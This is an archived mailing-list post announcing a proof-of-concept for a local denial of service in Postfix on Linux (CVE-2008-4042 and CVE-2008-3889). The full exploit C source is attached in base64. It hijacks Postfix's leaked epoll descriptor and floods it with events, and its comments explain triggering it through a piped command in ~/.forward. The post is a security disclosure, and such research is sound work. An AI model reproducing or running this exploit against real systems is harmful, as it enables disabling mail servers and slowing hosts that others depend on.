AOH :: HP Unsorted P :: VA1281.HTM

Postfix Linux-only local denial of service - PoC



Postfix Linux-only local denial of service - PoC
Postfix Linux-only local denial of service - PoC




--=-wIlX0+ZRGqD7KOkDUfmq
Content-Type: multipart/mixed; boundary="=-ZnRUX0PM/byROkEqVMKT"


--=-ZnRUX0PM/byROkEqVMKT
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

Hello,

I have released this PoC for the Linux-only local denial of service
caused by the leak of epoll file descriptors.

This Proof of concept creates a pipe and adds it in postfix's epoll file
descriptor.
When the pipe is added, an endless loop will launch lots of events to
the local and master postfix processes. 
This PoC will slowdown the system a lot.

You can find all the needed files at
http://www.wekk.net/research/CVE-2008-4042/ and 
http://www.wekk.net/research/CVE-2008-3889/ and attached with this 
email.

Feel free to write me for feedback, corrections, etc.

-- 
  Albert Sellar=C3=A8s        GPG id: 0x13053FFE
http://www.wekk.net whats_up@jabber.org 
  Linux User: 324456     Catalunya           

--=-ZnRUX0PM/byROkEqVMKT
Content-Disposition: attachment; filename=CVE-2008-4042-exploit.c
Content-Type: text/x-csrc; name=CVE-2008-4042-exploit.c; charset=UTF-8
Content-Transfer-Encoding: base64

LyoNCiAqIGh0dHA6Ly93d3cud2Vray5uZXQvcmVzZWFyY2gvQ1ZFLTIwMDgtNDA0Mi9DVkUtMjAw
OC00MDQyLWV4cGxvaXQuYw0KICogaHR0cDovL3d3dy53ZWtrLm5ldC9yZXNlYXJjaC9DVkUtMjAw
OC0zODg5L0NWRS0yMDA4LTM4ODktZXhwbG9pdC5jDQogKg0KICogRXhwbG9pdCBmb3IgUG9zdGZp
eCAyLjQgYmVmb3JlIDIuNC45LCAyLjUgYmVmb3JlIDIuNS41LCBhbmQgMi42IA0KICogYmVmb3Jl
IDIuNi0yMDA4MDkwMiwgd2hlbiB1c2VkIHdpdGggdGhlIExpbnV4IDIuNiBrZXJuZWwuDQogKg0K
ICogQ1ZFLTIwMDgtMzg4OSAmIENWRS0yMDA4LTQwNDINCiAqDQogKiBieSBBbGJlcnQgU2VsbGFy
w6hzIDx3aGF0c1thdF13ZWtrW2RvdF1uZXQ+IC0gaHR0cDovL3d3dy53ZWtrLm5ldA0KICogYW5k
IE1hcmMgTW9yYXRhIEZpdMOpIDxtYXJjLm1vcmF0YS5maXRlW2F0XWdtYWlsW2RvdF1jb20+IA0K
ICogMjAwOC0wOS0xNg0KICoNCiAqIFRoaXMgUHJvb2Ygb2YgY29uY2VwdCBjcmVhdGVzIGEgcGlw
ZSwgYW5kIGFkZHMgaXQgaW4gdGhlIHBvc3RmaXgncyBlcG9sbCANCiAqIGZpbGUgZGVzY3JpcHRv
ci4NCiAqIFdoZW4gdGhlIHBpcGUgaXMgYWRkZWQsIGEgZW5kbGVzcyBsb29wIHdpbGwgbGF1bmNo
IGxvdHMgb2YgZXZlbnRzIHRvIHRoZSANCiAqIGxvY2FsIGFuZCBtYXN0ZXIgcG9zdGZpeCBwcm9j
ZXNzZXMuIA0KICogVGhpcyB3aWxsIHNsb3dkb3duIGRlIHN5c3RlbSBhIGxvdC4NCiAqDQogKiBB
biBleGFtcGxlIG9mIHVzZToNCiAqIDEtIFB1dCB0aGUgY29udGVudCAifCB+L0NWRS0yMDA4LTM4
ODktZXhwbG9pdCA+PiAvdG1wL3Bvc3RmaXgubG9nICYiICh3aXRoIA0KICogdGhlIGRvdWJsZSBx
dW90ZXMpIA0KICogaW4gdGhlIGZpbGUgfi8uZm9yd2FyZA0KICoNCiAqIDItIFB1dCB0aGUgQ1ZF
LTIwMDgtNDA0Mi1leHBsb2l0IGluIHlvdXIgaG9tZQ0KICogZ2NjIENWRS0yMDA4LTM4ODktZXhw
bG9pdC5jIC1vIENWRS0yMDA4LTM4ODktZXhwbG9pdA0KICoNCiAqIDMtIFNlbmQgYW5kIGVtYWls
IHRvIHRoZSB1c2VyDQogKg0KICogWW91IGNhbiBzZWUgdGhlIG91dHB1dCBhdCAvdG1wL3Bvc3Rm
aXgubG9nDQogKi8NCg0KDQojaW5jbHVkZSA8c3lzL2Vwb2xsLmg+DQojaW5jbHVkZSA8c3RkaW8u
aD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCiNpbmNsdWRlIDxzdHJpbmcuaD4NCiNpbmNsdWRlIDxz
dGRpby5oPg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zdGF0Lmg+DQoj
aW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8ZGlyZW50Lmg+DQojaW5jbHVkZSA8ZXJybm8u
aD4NCg0KI2RlZmluZSBGRE9QRU4gMjAwDQoNCg0Kdm9pZCBhZGRfZmQoaW50IGZkZSwgaW50IGZk
KSB7DQoJcHJpbnRmKCJbKl0gQWRkaW5nIGZkICVkIHRvIGV2ZW50cG9sbCAlZFxuIiwgZmQsIGZk
ZSk7DQoJc3RhdGljIHN0cnVjdCBlcG9sbF9ldmVudCBldjsNCglldi5ldmVudHMgPSBFUE9MTElO
fEVQT0xMT1VUfEVQT0xMUFJJfEVQT0xMRVJSfEVQT0xMSFVQfEVQT0xMRVQ7DQoJZXJybm8gPTA7
DQoJLy8gSWYgdGhpcyBpcyBhIHNvY2tldCBmZCwgdGhlIGxvYWQgaXMgaGlnaA0KCWV2LmRhdGEu
dTMyID0gNjsNCglldi5kYXRhLnU2NCA9IDY7DQoNCglpZiAoZXBvbGxfY3RsKGZkZSwgRVBPTExf
Q1RMX0FERCwgZmQsICZldikgPT0gMCkgew0KCQlwcmludGYoIiA9PiBGZCAlZCBhZGRlZCFcbiIs
IGZkKTsNCgl9IGVsc2Ugew0KCQlwcmludGYoIiA9PiBFcnJvciAoJWQpIGFkZGluZyBmZCAlZFxu
IiwgZXJybm8sIGZkKTsNCgl9DQp9DQoNCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10p
IHsNCg0KCWludCBmZHNbMl07DQoJY2hhciBkaXJbMzJdLCBjOw0KCWludCBpLCBmb3VuZCA9IDA7
DQoNCglwaXBlKGZkcyk7DQoJc3ByaW50ZihkaXIsICIvcHJvYy8lZC9mZCIsIGdldHBpZCgpKTsN
CglwcmludGYoIlsqXSBPcGVuaW5nIGRpcmVjdG9yeSAlc1xuIiwgZGlyKTsNCglESVIgKmZkX2Rp
ciA9IG9wZW5kaXIoZGlyKTsNCglzdHJ1Y3QgZGlyZW50ICpkZSA9IHJlYWRkaXIoZmRfZGlyKTsN
Cg0KCS8vIFdlIGFyZSBsb29raW5nIGZvciB0aGUgZXZlbnRwb2xsIGZpbGUgZGVzY3JpcHRvcg0K
CXdoaWxlIChkZSAhPSBOVUxMKSB7DQoJCWNoYXIgbGlua19kWzI1Nl07DQoJCWNoYXIgbGlua19m
WzI1Nl07DQoJCW1lbXNldChsaW5rX2QsIDAsIDI1Nik7DQoJCXNwcmludGYobGlua19mLCAiJXMv
JXMiLCBkaXIsIGRlLT5kX25hbWUpOw0KCQlyZWFkbGluayhsaW5rX2YsIGxpbmtfZCwgMjU2KTsN
CgkJaWYgKCBzdHJzdHIobGlua19kLCAiZXZlbnRwb2xsIikgKSB7DQoJCQlmb3VuZCA9IDE7DQoJ
CQlwcmludGYoIiA9PiAlcyBwb2ludHMgdG8gJXNcbiIsIGRlLT5kX25hbWUsIGxpbmtfZCk7DQoJ
CQlhZGRfZmQoYXRvaShkZS0+ZF9uYW1lKSwgZmRzWzBdKTsNCgkJCS8vIFdlIGNhbiB0ZXN0IHdp
dGggbW9yZSB0aGFuIG9uZSB0cmlnZ2VyZWQgZXZlbnQgYXQgb25jZQ0KCQkJZm9yIChpID0gMDsg
aTxGRE9QRU47IGkrKykNCgkJCQlhZGRfZmQoYXRvaShkZS0+ZF9uYW1lKSxkdXAoZmRzWzBdKSk7
DQoJCX0NCgkJZGUgPSByZWFkZGlyKGZkX2Rpcik7DQoJfQ0KCWNsb3NlZGlyKGZkX2Rpcik7DQoJ
DQoJaWYgKGZvdW5kID09IDApIHsNCgkJcHJpbnRmKCJbIV0gQXJlIHlvdSBzdXJlIHRoYXQgeW91
ciBwb3N0Zml4IGlzIHZ1bG5lcmFibGU/XG4iKTsNCgkJcHJpbnRmKCJbIV0gQXJlIHlvdSBsYXVu
Y2hpbmcgbWUgdGhyb3cgYSAuZm9yd2FyZCBmaWxlP1xuIik7DQoJCWV4aXQoMCk7DQoJfQ0KCQ0K
CXByaW50ZigiWypdIFN0YXJ0aW5nIHRvIGZsb29kIHRoZSBzeXN0ZW0hXG4iKTsNCglmZmx1c2go
c3Rkb3V0KTsNCgljbG9zZSgwKTsNCgljbG9zZSgxKTsNCgljbG9zZSgyKTsNCg0KCS8vIFRoaXMg
dHJpZ2dlcnMgdGhlIGV2ZW50cw0KCXdoaWxlICgxKSB7DQoJCXdyaXRlKGZkc1sxXSwgIkEiLDEp
Ow0KCQlyZWFkKGZkc1swXSwmYywgMSk7DQoJfQ0KDQoJcmV0dXJuIDA7DQp9DQo

--=-ZnRUX0PM/byROkEqVMKT--

--=-wIlX0+ZRGqD7KOkDUfmq
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: =?ISO-8859-1?Q?Aix=F2?= =?ISO-8859-1?Q?_=E9s?= una part
	d'un missatge, signada digitalment

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.9 (GNU/Linux)

iEYEABECAAYFAkjQFP8ACgkQK3eYPRMFP/4sUwCglO1ePf6SC6w9YYdhCr9rCrJK
Q1wAoNYy9W7aQnUsngr5IetlN+otR7th
=wlm2
-----END PGP SIGNATURE-----

--=-wIlX0+ZRGqD7KOkDUfmq--


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.